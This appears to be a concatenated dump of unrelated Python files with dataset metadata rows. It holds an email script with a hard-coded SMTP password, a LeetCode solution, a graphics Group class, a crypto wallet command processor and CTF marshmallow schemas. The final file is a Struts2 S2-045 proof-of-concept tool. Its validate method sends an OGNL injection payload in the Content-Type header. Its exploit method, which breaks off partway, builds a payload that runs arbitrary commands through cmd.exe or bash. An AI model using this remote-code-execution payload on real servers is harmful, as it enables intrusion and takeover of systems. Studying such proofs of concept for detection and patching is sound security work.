    """Read the image file at *src* and wrap it in a MIMEImage part.

    :param src: path of the image file to attach
    :param imgid: value for the Content-ID header (referenced as ``cid:`` in HTML)
    :return: MIMEImage part ready to be attached to a multipart message
    """
    # 'with' guarantees the file handle is closed even if MIMEImage raises
    # (the original left the file open on error).
    with open(src, 'rb') as fp:
        msg_img = MIMEImage(fp.read())
    msg_img.add_header('Content-ID', imgid)
    return msg_img
# Build the multipart message: inline HTML body referencing the embedded image.
msg = MIMEMultipart('related')
msgtext = MIMEText("""
<font>官网业务平均时延图表:<br><img src=\"cid:p1\" border =\"1\"><br>详细内附件图表</font>
""", "html", "utf-8")
msg.attach(msgtext)
# Embed the chart image under Content-ID "p1" so the HTML's cid:p1 resolves.
msg.attach(addimg("/home/hgf/Pictures/program/logo/1.PNG", "p1"))
attach = MIMEText(open("/home/hgf/test.xlsx", 'rb').read(), "base64", "utf-8")
# Mark the payload as a generic binary file.
attach["Content-type"] = "application/octet-stream"
# Setting Content-Disposition to "attachment" makes mail clients offer a
# save-file dialog for the spreadsheet.
# QQ Mail uses gb18030 encoding; re-encode the filename so the Chinese
# characters are not garbled. (NOTE: .decode on a str is Python-2-only.)
attach["Content-Disposition"] = "attachment;filename=\"测试excel.xlsx\"".decode("utf-8").encode("gb18030")
msg.attach(attach)
msg['Subject'] = SUBJECT
msg['From'] = FROM
msg['To'] = TO
try:
server = smtplib.SMTP()
server.connect(HOST, 25)
server.starttls()
server.login(FROM, "passwprd")
server.sendmail(FROM, TO, msg.as_string())
server.quit()
print("发送成功!")
except Exception, e:
print("发送失败:"+ str(e)) | 24.781818 | 104 | 0.685987 | 180 | 1,363 | 5.161111 | 0.572222 | 0.017223 | 0.041981 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028644 | 0.129127 | 1,363 | 55 | 105 | 24.781818 | 0.754002 | 0.09391 | 0 | 0 | 0 | 0.026316 | 0.285134 | 0.124289 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.026316 | 0.105263 | null | null | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a36e802cfc7def6cead77254887144e38e9206da | 457 | py | Python | 0844_BackspaceStringCompare.py | taro-masuda/leetcode | 39739e9fec7c66513b114c740ef982ccc09dc39f | [
"MIT"
] | null | null | null | 0844_BackspaceStringCompare.py | taro-masuda/leetcode | 39739e9fec7c66513b114c740ef982ccc09dc39f | [
"MIT"
] | null | null | null | 0844_BackspaceStringCompare.py | taro-masuda/leetcode | 39739e9fec7c66513b114c740ef982ccc09dc39f | [
"MIT"
] | 1 | 2020-03-18T05:23:40.000Z | 2020-03-18T05:23:40.000Z | class Solution:
def backspaceCompare(self, S: str, T: str) -> bool:
s = []; t = []
for i in range(len(S)):
if S[i] == "#":
if len(s) > 0:
s.pop(-1)
else:
s.append(S[i])
for i in range(len(T)):
if T[i] == "#":
if len(t) > 0:
t.pop(-1)
else:
t.append(T[i])
return s == t
| 26.882353 | 55 | 0.319475 | 57 | 457 | 2.561404 | 0.368421 | 0.027397 | 0.082192 | 0.150685 | 0.191781 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018265 | 0.520788 | 457 | 16 | 56 | 28.5625 | 0.648402 | 0 | 0 | 0.125 | 0 | 0 | 0.004376 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a36f7eea6ef24d0f6b6fdf9e851a832919ac22fc | 1,371 | py | Python | jygsaw/group.py | talwai/jygsaw | 70847c797ff1fb3034bf9d6f95fa6dce1b9056f7 | [
"WTFPL"
] | 2 | 2017-11-21T03:04:47.000Z | 2020-03-10T11:05:15.000Z | jygsaw/group.py | talwai/jygsaw | 70847c797ff1fb3034bf9d6f95fa6dce1b9056f7 | [
"WTFPL"
] | null | null | null | jygsaw/group.py | talwai/jygsaw | 70847c797ff1fb3034bf9d6f95fa6dce1b9056f7 | [
"WTFPL"
] | null | null | null | """
A Group is a convenient way to manage a group of GraphicsObjects.
"""
from graphicsobject import *
from shape import Shape
class Group():
"""
A Group object will hold a list of shapes, text, images and other objects, that are grouped together for convenience.
"""
def __init__(self, *objects):
"""Create a Group object, containing a variable number of objects."""
self.group = []
for o in objects:
assert (isinstance(o, Shape) or isinstance(o,
GraphicsObject)), "%s is not Shape " % o
self.group.append(o)
def __len__(self):
return len(self.group)
def remove(self, *objects):
"""Removes all specified objects from the :py:class:`~jygsaw.group.Group` """
for o in objects:
self.group.remove(o)
def append(self, *objects):
"""Appends all specified objects to the :py:class:`~jygsaw.group.Group` ."""
for o in objects:
assert (isinstance(o, Shape) or isinstance(o,
GraphicsObject)), "%s is not Shape" % o
self.group.append(o)
def move(self, deltaX, deltaY):
"""Moves all objects in the :py:class:`~jygsaw.group.Group` by calling :py:meth:`jygsaw.graphics.move` on each element within it. """
for o in self.group:
o.move(deltaX, deltaY)
| 32.642857 | 141 | 0.603209 | 180 | 1,371 | 4.55 | 0.377778 | 0.065934 | 0.029304 | 0.040293 | 0.344322 | 0.344322 | 0.312576 | 0.312576 | 0.312576 | 0.312576 | 0 | 0 | 0.282276 | 1,371 | 41 | 142 | 33.439024 | 0.832317 | 0.378556 | 0 | 0.409091 | 0 | 0 | 0.038319 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 1 | 0.227273 | false | 0 | 0.090909 | 0.045455 | 0.409091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a370857b060f7f1d08fab12ce57d3d4ecfea38e5 | 18,873 | py | Python | wallet_manager/command_processor.py | DEX-Company/wallet-manager | bafb434a8f7b2277234e26b9ffde3237a6016ce6 | [
"Apache-2.0"
] | null | null | null | wallet_manager/command_processor.py | DEX-Company/wallet-manager | bafb434a8f7b2277234e26b9ffde3237a6016ce6 | [
"Apache-2.0"
] | null | null | null | wallet_manager/command_processor.py | DEX-Company/wallet-manager | bafb434a8f7b2277234e26b9ffde3237a6016ce6 | [
"Apache-2.0"
] | null | null | null | import inspect
import re
import os.path
import json
import secrets
import time
import logging
import sys
from web3 import (
Web3,
HTTPProvider
)
from eth_account import Account as EthAccount
from starfish import Ocean
from starfish.account import Account as OceanAccount
from wallet_manager.wallet_manager import WalletManager
from wallet_manager import logger
DEFAULT_REQUEST_TOKEN_AMOUNT = 10
class CommandProcessError(Exception):
    """Error raised by the command processor when a wallet command fails."""
    pass
class CommandProcessor():
    """Parses and executes wallet-manager CLI commands.

    Each ``command_<name>`` method implements one CLI verb, and the matching
    ``document_<name>`` method returns its help text (collected by
    :meth:`command_document_list`).  Results are accumulated via
    :meth:`_add_output` and exposed through the :attr:`output` property
    instead of being printed directly.
    """

    # Known networks.  'url' is the keeper node endpoint, 'faucet_url' is an
    # HTTP faucet service, and 'faucet_account' is a pre-funded
    # [address, password] pair available on local test chains.
    NETWORK_NAMES = {
        'local': {
            'description': 'No network, only access to local account setup',
        },
        'spree': {
            'description': 'Spree network running on a local barge',
            'url': 'http://localhost:8545',
            'faucet_account': ['0x068Ed00cF0441e4829D9784fCBe7b9e26D4BD8d0', 'secret'],
        },
        'nile': {
            'description': 'Nile network access to remote network node',
            'url': 'https://nile.dev-ocean.com',
            'faucet_url': 'https://faucet.nile.dev-ocean.com/faucet',
        },
        'pacific': {
            'description': 'Pacific network access to remote network node',
            'url': 'https://pacific.oceanprotocol.com',
            'faucet_url': 'https://faucet.oceanprotocol.com/faucet',
        },
        'duero': {
            'description': 'Duero network access to remote network node',
            'url': 'https://duero.dev-ocean.com',
            'faucet_url': 'https://faucet.duero.dev-ocean.com/faucet',
        },
        'host': {
            'description': 'Local node running on barge',
            'url': 'http://localhost:8545',
        }
    }

    def __init__(self, key_chain_filename=None):
        """Create a processor backed by a WalletManager key chain file."""
        self._commands = None
        self._output = []
        self._wallet = WalletManager(key_chain_filename=key_chain_filename)

    def document_new(self):
        # parameter was previously misspelled 'sef'; callers always invoke
        # this as a bound method, so renaming it to 'self' is safe
        return {
            'description': 'Create account local and host',
            'params': [
                'new <password> [local]',
                'new <password> <network_name or url>',
            ],
        }

    def command_new(self):
        """Create a new account locally or on a remote node."""
        address = ''
        password = self._validate_password(1)
        network_name = self._validate_network_name_url(2, 'local')
        if network_name == 'local':
            address = self._wallet.new_account(password)
        else:
            node_url = self._validate_network_name_to_value(network_name)
            address = self._wallet.new_account(password, node_url)
        self._add_output(address)

    def document_delete(self):
        return {
            'description': 'Delete account on local and host',
            'params': [
                'delete <address> <password> [local]',
                'delete <address> <password> <network_name or url>',
            ]
        }

    def command_delete(self):
        """Delete an account from the local key chain or a remote node."""
        address = self._validate_address(1)
        password = self._validate_password(2)
        network_name = self._validate_network_name_url(3, 'local')
        if network_name == 'local':
            # return value of delete_account is not used
            self._wallet.delete_account(address, password)
        else:
            node_url = self._validate_network_name_to_value(network_name)
            self._wallet.delete_account(address, password, node_url)
        self._add_output(f'delete account {address}')

    def document_copy(self):
        return [
            {
                'description': 'Copy local account to host',
                'params': [
                    'copy local <local_address> <password> <network_name or url>',
                ],
            },
            {
                'description': 'Copy host account to local',
                'params': [
                    'copy <network_name or url> <host_address> <password> [local]',
                ],
            }
        ]

    def command_copy(self):
        """Copy an account between local and host key stores (not implemented)."""
        pass

    def document_list(self):
        return {
            'description': 'List accounts on local and host',
            'params': [
                'list [local]',
                'list <network_name or url>',
            ],
        }

    def command_list(self):
        """List account addresses held locally or on a remote node."""
        result = None
        network_name = self._validate_network_name_url(1, 'local')
        if network_name == 'local':
            result = self._wallet.list_accounts()
        else:
            node_url = self._validate_network_name_to_value(network_name)
            result = self._wallet.list_accounts(node_url)
        self._add_output(result)

    def document_export(self):
        return {
            'description': 'Export local and host account to JSON or private key',
            'params': [
                '[--as_json] [--as_key] export <address> <password> [local]',
                '[--as_json] [--as_key] export <address> <password> <network_name or url>',
            ],
        }

    def command_export(self):
        """Export an account's key material as JSON."""
        address = self._validate_address(1)
        password = self._validate_password(2)
        network_name = self._validate_network_name_url(3, 'local')
        if network_name == 'local':
            result = self._wallet.export_account_json(address, password)
        else:
            node_url = self._validate_network_name_to_value(network_name)
            result = self._wallet.export_account_json(address, password, node_url)
        self._add_output(f'Address {address} key:')
        self._add_output(result)

    def document_import(self):
        return {
            'description': 'Import local and host account from JSON key file, or private key',
            'params': [
                '[--as_json] [--as_key] import <json_file or string> <password> [local]',
                '[--as_json] [--as_key] import <json_file or string> <password> <network_name or url>',
            ],
        }

    def command_import(self):
        """Import an account from a JSON key file or JSON string."""
        json_text = self._validate_json_text(1)
        password = self._validate_password(2)
        network_name = self._validate_network_name_url(3, 'local')
        if network_name == 'local':
            result = self._wallet.import_account_json(json_text, password)
        else:
            node_url = self._validate_network_name_to_value(network_name)
            result = self._wallet.import_account_json(json_text, password, node_url)

    def document_password(self):
        return {
            'description': 'Change account password on local and host',
            'params': [
                'password <address> <old_password> <new_password> [local]',
                'password <address> <old_password> <new_password> <network_name or url>',
            ],
        }

    def command_password(self):
        """Change an account password (not implemented)."""
        pass

    def document_get(self):
        return [
            {
                'description': 'Get ether from faucet. The amount is only used in local spree network',
                'params': [
                    'get ether <address> <network_name or faucet url> [amount]',
                ],
            },
            {
                'description': 'Get Ocean tokens on test networks, using a temporary transfer account to request tokens',
                'params': [
                    'get tokens <address> <network_name or url> [amount]',
                ],
            }
        ]

    def command_get(self):
        """Obtain ether or Ocean tokens for an address on a test network."""
        sub_command = self._validate_sub_command(1, ['ether', 'tokens'])
        address = self._validate_address(2)
        network_name = self._validate_network_name_url(3)
        amount = self._validate_amount(4, DEFAULT_REQUEST_TOKEN_AMOUNT)
        if sub_command == 'tokens':
            node_url = self._validate_network_name_to_value(network_name)
            # throw-away pass phrase for the temporary transfer account
            password = secrets.token_hex(32)
            request_address = self._wallet.new_account(password, node_url)

            node_status = self._wallet.get_chain_status(node_url)
            if node_status and node_status['blockGap'] is not None:
                self._add_output('Please wait: The local node is not yet in sync')
                return

            logger.info(f'created temp account {request_address}')
            ocean = Ocean(keeper_url=node_url)
            account = OceanAccount(ocean, request_address, password)

            chain_name = self._wallet.get_chain_name(node_url)
            logger.debug(f'chain name is {chain_name}')
            faucet_url = self._validate_network_name_to_value(chain_name, False, 'faucet_url')
            logger.debug(f'requesting ether from faucet at {faucet_url}')
            self._wallet.get_ether(request_address, faucet_url)

            logger.debug('waiting for ether to be available in register account')
            while True:
                account = OceanAccount(ocean, request_address, password)
                if account.ether_balance > 0:
                    break
                time.sleep(1)
            logger.debug(f'{request_address} ether tokens: {account.ether_balance}')

            logger.debug('requesting ocean tokens')
            account.unlock(password)
            account.request_tokens(amount)

            logger.debug('waiting for ocean tokens to be available in request account')
            while True:
                account = OceanAccount(ocean, request_address, password)
                if account.ocean_balance > 0:
                    break
                time.sleep(1)
            logger.debug(f'{request_address} ocean tokens: {account.ocean_balance}')
            logger.debug(f'{request_address} ether: {account.ether_balance}')

            node_status = self._wallet.get_chain_status(node_url)
            if node_status and node_status['blockGap'] is not None:
                self._add_output('Please wait: The local node is not yet in sync')
                return

            logger.debug(f'transfer {amount} from {request_address} to {address}')
            time.sleep(2)
            account.unlock(password)
            account.transfer_token(address, amount)

            ether_amount = 0
            if account.ether_balance > 0:
                # leave a tiny remainder behind to cover the transfer gas
                ether_amount = float(account.ether_balance) - 0.0000000001
                account.transfer_ether(address, ether_amount)

            # delete the temporary request account
            self._wallet.delete_account(request_address, password, node_url)
            self._add_output(f'sent {amount} ocean tokens and {ether_amount:.4f} ether to account {address}')
        elif sub_command == 'ether':
            node_url = self._validate_network_name_to_value(network_name)
            chain_name = self._wallet.get_chain_name(node_url)
            logger.debug(f'chain name is {chain_name}')
            faucet_url = self._validate_network_name_to_value(chain_name, False, 'faucet_url')
            if faucet_url:
                self._wallet.get_ether(address, faucet_url)
                ocean = Ocean(keeper_url=node_url)
                account = OceanAccount(ocean, address)
                self._add_output(f'{address} ether : {account.ether_balance}')
                return
            faucet_account = self._validate_network_name_to_value(network_name, False, 'faucet_account')
            if faucet_account:
                # faucet_account is an [address, password] pair of a
                # pre-funded account that can hand out ether directly
                self._wallet.send_ether(faucet_account[0], faucet_account[1], address, amount, node_url)
                # 'account' was previously referenced here without being
                # assigned (NameError); build it before reading the balance
                ocean = Ocean(keeper_url=node_url)
                account = OceanAccount(ocean, address)
                self._add_output(f'{address} ether : {account.ether_balance}')
                return
            raise CommandProcessError(f'Warning: The network name {network_name} does not have a faucet')

    def document_request(self):
        return [
            {
                'description': 'Request Ocean tokens on a test network',
                'params': [
                    'request tokens <address> <password> <network_name or url> [amount]',
                ],
            }
        ]

    def command_request(self):
        """Request Ocean tokens directly for an existing unlocked account."""
        sub_command = self._validate_sub_command(1, ['tokens'])
        address = self._validate_address(2)
        password = self._validate_password(3)
        network_name = self._validate_network_name_url(4)
        amount = self._validate_amount(5, DEFAULT_REQUEST_TOKEN_AMOUNT)
        node_url = self._validate_network_name_to_value(network_name)
        ocean = Ocean(keeper_url=node_url)
        account = OceanAccount(ocean, address)
        account.unlock(password)
        account.request_tokens(amount)
        self._add_output(f'{address} ocean tokens: {account.ocean_balance}')

    def document_balance(self):
        return {
            'description': 'Show the ether and Ocean token balance',
            'params': [
                'balance <address> <network_name or faucet url>',
            ],
        }

    def command_balance(self):
        """Report the Ocean token and ether balances of an address."""
        address = self._validate_address(1)
        network_name = self._validate_network_name_url(2)
        node_url = self._validate_network_name_to_value(network_name)
        ocean = Ocean(keeper_url=node_url)
        account = OceanAccount(ocean, address)
        self._add_output(f'{address} ocean tokens: {account.ocean_balance}')
        self._add_output(f'{address} ether: {account.ether_balance}')

    def document_send(self):
        return [
            {
                'description': 'Transfer Ocean tokens to another account',
                'params': [
                    'send tokens <from_address> <password> <network_name or url> <to_address> <amount>',
                ],
            },
            {
                'description': 'Transfer Ocean ether to another account',
                'params': [
                    'send ether <from_address> <password> <network_name or url> <to_address> <amount>',
                ],
            }
        ]

    def command_send(self):
        """Transfer tokens or ether from one account to another."""
        sub_command = self._validate_sub_command(1, ['ether', 'tokens'])
        from_address = self._validate_address(2, field_name='from_address')
        password = self._validate_password(3)
        network_name = self._validate_network_name_url(4)
        node_url = self._validate_network_name_to_value(network_name)
        to_address = self._validate_address(5, field_name='to_address')
        amount = self._validate_amount(6)
        if sub_command == 'tokens':
            ocean = Ocean(keeper_url=node_url)
            account = OceanAccount(ocean, from_address)
            account.unlock(password)
            account.transfer_token(to_address, amount)
        elif sub_command == 'ether':
            self._wallet.send_ether(from_address, password, to_address, amount, node_url)

    def command_test(self):
        """Debug helper: print the raw command list."""
        print(self._commands)

    def process(self, commands):
        """Dispatch an argv-style command list to the matching command_ method.

        Raises:
            CommandProcessError: if the first token is not a known command.
        """
        self._commands = commands
        method_name = f'command_{commands[0]}'
        if hasattr(self, method_name):
            method = getattr(self, method_name)
            method()
        else:
            raise CommandProcessError(f'Invalid command "{commands[0]}"')

    def command_document_list(self, app_name):
        """Collect and format help text from every document_ method."""
        items = []
        for name in dir(self):
            if re.match('^document_', name):
                method = getattr(self, name)
                values = method()
                # a document_ method may return a single dict or a list of them
                if isinstance(values, list):
                    for value in values:
                        items += self._expand_document_item(app_name, value)
                else:
                    items += self._expand_document_item(app_name, values)
        return items

    def _validate_password(self, index):
        """Return the password argument at *index*, or raise."""
        password = None
        if index < len(self._commands):
            password = self._commands[index]
        if not isinstance(password, str):
            raise CommandProcessError('Please provide a password')
        return password

    def _validate_network_name_url(self, index, default=None):
        """Return the network name/URL argument, falling back to *default*.

        Raises:
            CommandProcessError: if the argument is missing and no default
                was supplied (previously this raised even when a default
                existed, making optional '[local]' arguments unusable).
        """
        network_name = default
        if index < len(self._commands):
            network_name = self._commands[index]
        elif default is None:
            raise CommandProcessError('Please provide a network name')
        return network_name

    def _validate_address(self, index, field_name=None):
        """Return a checksummed account address argument, or raise."""
        if field_name is None:
            field_name = 'address'
        if index < len(self._commands):
            address = self._commands[index]
            if Web3.isAddress(address):
                return address
            else:
                raise CommandProcessError(f'"{address}" is not a valid account {field_name}')
        else:
            raise CommandProcessError('Please provide an address name')

    def _validate_json_text(self, index):
        """Return JSON key text, reading it from a file if a path was given."""
        if index < len(self._commands):
            json_text = self._commands[index]
            if os.path.exists(json_text):
                with open(json_text, 'r') as fp:
                    json_text = fp.read()
            try:
                data = json.loads(json_text)
            except json.decoder.JSONDecodeError:
                raise CommandProcessError('Please provide valid json key file or text')
            return json_text
        else:
            raise CommandProcessError('Please provide json text or filename')

    def _validate_network_name_to_value(self, network_name, validate=True, name=None):
        """Resolve a network name (or raw URL/hostname) to a config value.

        Args:
            network_name (str): a NETWORK_NAMES key, or an explicit URL.
            validate (bool): if True, raise when the value cannot be resolved.
            name (str): configuration key to look up (defaults to 'url').
        """
        value = None
        if name is None:
            name = 'url'
        if network_name.lower() in self.NETWORK_NAMES:
            # .get() so networks without the requested key (e.g. no faucet)
            # resolve to None instead of raising KeyError
            value = self.NETWORK_NAMES[network_name.lower()].get(name)
        # accept raw URLs or dotted hostnames as-is
        # (the hostname pattern was previously '^/w+\.', matching a literal
        # slash instead of a word character)
        if re.match('^http', network_name) or re.match(r'^\w+\.', network_name):
            value = network_name
        if value is None and validate:
            raise CommandProcessError(f'Cannot resolve network name "{network_name}" to a value')
        return value

    def _validate_sub_command(self, index, command_list):
        """Return the sub-command argument if it is one of *command_list*."""
        command_list_text = ','.join(command_list)
        if index < len(self._commands):
            sub_command = self._commands[index]
            if sub_command in command_list:
                return sub_command
            raise CommandProcessError(f'Invalid command "{sub_command}", one of the following commands "{command_list_text}"')
        else:
            raise CommandProcessError(f'Please provide one of the following commands "{command_list_text}"')

    def _validate_amount(self, index, default_value=None):
        """Return the integer amount argument, or *default_value* if absent."""
        amount = default_value
        if index < len(self._commands):
            try:
                amount = int(self._commands[index])
            except ValueError:
                # previously an uncaught ValueError escaped to the caller
                raise CommandProcessError(f'"{self._commands[index]}" is not a valid amount')
        if amount is None:
            raise CommandProcessError('Please provide an amount')
        return amount

    def _expand_document_item(self, app_name, value):
        """Format one help entry as a description line plus usage lines."""
        items = []
        items.append(f'\n{value["description"]}')
        for param in value['params']:
            items.append(f'    {app_name} {param}')
        return items

    def _add_output(self, text):
        """Append a string, or each item of an iterable, to the output list."""
        if isinstance(text, str):
            self._output.append(text)
        else:
            for value in text:
                self._output.append(value)

    @property
    def output(self):
        """List of output lines accumulated by the last command."""
        return self._output
| 38.993802 | 126 | 0.595189 | 2,085 | 18,873 | 5.127578 | 0.105036 | 0.079226 | 0.042653 | 0.04733 | 0.524928 | 0.461229 | 0.384716 | 0.33879 | 0.269011 | 0.23908 | 0 | 0.00705 | 0.308536 | 18,873 | 483 | 127 | 39.074534 | 0.812184 | 0.004875 | 0 | 0.35461 | 0 | 0 | 0.231867 | 0.016668 | 0 | 0 | 0.002237 | 0 | 0 | 1 | 0.085106 | false | 0.122931 | 0.049645 | 0.028369 | 0.200946 | 0.002364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a370fc8bae2f0332499a9e7de9b11bf1e10df407 | 2,790 | py | Python | backend/bigeye/schemas/schemas.py | Astropilot/BigEye | 4e1c246391c5f6e1c8ea4e4c35ee5fec209960a6 | [
"MIT"
] | null | null | null | backend/bigeye/schemas/schemas.py | Astropilot/BigEye | 4e1c246391c5f6e1c8ea4e4c35ee5fec209960a6 | [
"MIT"
] | null | null | null | backend/bigeye/schemas/schemas.py | Astropilot/BigEye | 4e1c246391c5f6e1c8ea4e4c35ee5fec209960a6 | [
"MIT"
] | null | null | null | from marshmallow import fields, validate
from marshmallow_enum import EnumField
from bigeye.models.base import ma
from bigeye.models.user import UserRoles
from bigeye.models.challenge import ChallengeDifficulty
class ChallengeCategorySchema(ma.Schema):
    """Serialization schema for a challenge category."""
    # Primary key; server-assigned, never accepted from input.
    id = fields.Integer(dump_only=True)
    # Category name: 3-40 word characters (letters, digits, underscore).
    name = fields.String(required=True, validate=validate.Regexp('^[a-zA-Z0-9_]{3,40}$'))
    # Aggregate counters computed server-side; output only.
    total_challenges = fields.Integer(dump_only=True)
    total_challenges_resolved = fields.Integer(dump_only=True)
class ChallengeSchema(ma.Schema):
    """Serialization schema for a CTF challenge."""
    # Primary key; server-assigned.
    id = fields.Integer(dump_only=True)
    title = fields.String(required=True)
    description = fields.String(required=False, missing=None)
    # Serialized via its enum member name.
    difficulty = EnumField(ChallengeDifficulty, required=True)
    # The secret flag is write-only: accepted on create, never dumped.
    flag = fields.String(load_only=True, required=True)
    category = fields.Nested(ChallengeCategorySchema, dump_only=True)
    points = fields.Integer(required=True)
    created_at = fields.DateTime(dump_only=True)
    # 'link' is accepted on input (must be an absolute URL) while
    # 'resource_link' is the dumped counterpart.
    resource_link = fields.String(dump_only=True)
    link = fields.String(load_only=True, required=False, validate=validate.URL(relative=False))
    hint = fields.String(required=False, missing=None)
    # Whether the requesting user has solved this challenge; computed.
    is_resolved = fields.Boolean(dump_only=True)
class ChallengeResolveSchema(ma.Schema):
    """Serialization schema for a user's successful challenge solve."""
    id = fields.Integer(dump_only=True)
    # Lambda defers UserSchema resolution (UserSchema is defined below and
    # itself nests this schema — a circular reference).
    user = fields.Nested(lambda: UserSchema(only=('id', 'email', 'username', 'role')), dump_only=True)
    challenge = fields.Nested(ChallengeSchema, dump_only=True)
    # Points awarded at solve time.
    points = fields.Integer(dump_only=True)
    resolved_at = fields.DateTime(dump_only=True)
class UserSchema(ma.Schema):
    """Serialization schema for a user account."""
    id = fields.Integer(dump_only=True)
    created_at = fields.DateTime(dump_only=True)
    email = fields.String(required=True, validate=validate.Email())
    # Username: 3-20 word characters.
    username = fields.String(required=True, validate=validate.Regexp('^[a-zA-Z0-9_]{3,20}$'))
    role = EnumField(UserRoles, dump_only=True)
    # Write-only; must contain a lowercase, an uppercase, a digit and a
    # special character, 8+ characters total.
    password = fields.String(load_only=True, validate=validate.Regexp('^(?=.*[a-z])(?=.*[A-Z])(?=.*[0-9])(?=.*[!@#$%^&*_=+-]).{8,}$'))
    # Auth token issued by the server; output only.
    token = fields.String(dump_only=True)
    # Score aggregates computed server-side.
    total_points = fields.Integer(dump_only=True)
    total_points_solved = fields.Integer(dump_only=True)
    # Solve history; 'user' excluded to break the circular nesting.
    challenges_resolved = fields.List(fields.Nested(ChallengeResolveSchema(exclude=('user',))), dump_only=True)
# Pre-built schema instances shared by the API layer.
# Public view of another user (no email, token or stats).
user_schema = UserSchema(only=('id', 'username', 'role', 'created_at'))
# Full view, used for the authenticated user's own profile.
user_schema_own = UserSchema()
# Scoreboard listing.
users_schema = UserSchema(many=True, only=('id', 'username', 'created_at', 'total_points_solved', 'challenges_resolved'))
challengecategory_schema = ChallengeCategorySchema(many=True)
challengecategorysingle_schema = ChallengeCategorySchema()
# Category is excluded when challenges are listed within a category.
challenges_schema = ChallengeSchema(many=True, exclude=('category',))
challenge_schema = ChallengeSchema()
challengeresolve_schema = ChallengeResolveSchema()
| 45 | 134 | 0.749462 | 341 | 2,790 | 5.97654 | 0.231672 | 0.090285 | 0.117763 | 0.092738 | 0.402355 | 0.32581 | 0.157017 | 0.157017 | 0.052012 | 0.052012 | 0 | 0.005244 | 0.11147 | 2,790 | 61 | 135 | 45.737705 | 0.816862 | 0 | 0 | 0.125 | 0 | 0 | 0.076344 | 0.021505 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.020833 | 0.104167 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
a38ba073f85b00fee5759b368e3de80e9bf37f45 | 2,928 | py | Python | scripts/poc/structs2/s2-45.py | BenDerPan/POCs | 4ce7137ccc6d797f18193b4783929d6422437696 | [
"MIT"
] | 7 | 2017-10-07T09:46:05.000Z | 2021-08-18T07:11:19.000Z | scripts/poc/structs2/s2-45.py | BenDerPan/POCs | 4ce7137ccc6d797f18193b4783929d6422437696 | [
"MIT"
] | null | null | null | scripts/poc/structs2/s2-45.py | BenDerPan/POCs | 4ce7137ccc6d797f18193b4783929d6422437696 | [
"MIT"
] | 3 | 2017-10-08T03:26:53.000Z | 2019-03-10T15:10:11.000Z | import http.client
import urllib
import urllib.request

import requests

from scripts.poc.poc_interface import PocInterface
class Structs2_45(PocInterface):
    '''
    Validation and exploitation of the Struts2 S2-045 vulnerability
    (CVE-2017-5638): OGNL injection via the Content-Type header.
    '''
    def validate(self, url):
        '''
        Check whether the given URL is vulnerable to S2-045.

        Sends an OGNL payload in the Content-Type header that evaluates
        102*102*102*99 and looks for the product (105059592) in the body.

        :param url: URL to test
        :return: True if the vulnerability is present, False otherwise
        '''
        payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"
        headers = {"Content-Type": payload}
        r = requests.get(url, headers=headers)
        # Response.content is bytes on Python 3; comparing a str against it
        # would never match, so compare against a bytes literal
        if b"105059592" in r.content:
            return True
        return False

    def exploit(self, url, cmd):
        '''
        Execute an arbitrary command on a host vulnerable to S2-045.

        :param url: target URL
        :param cmd: command to execute
        :return: response body produced after executing the command
        '''
        payload = "%{(#_='multipart/form-data')."
        payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
        payload += "(#_memberAccess?"
        payload += "(#_memberAccess=#dm):"
        payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
        payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
        payload += "(#ognlUtil.getExcludedPackageNames().clear())."
        payload += "(#ognlUtil.getExcludedClasses().clear())."
        payload += "(#context.setMemberAccess(#dm))))."
        payload += "(#cmd='%s')." % cmd
        payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
        payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
        payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
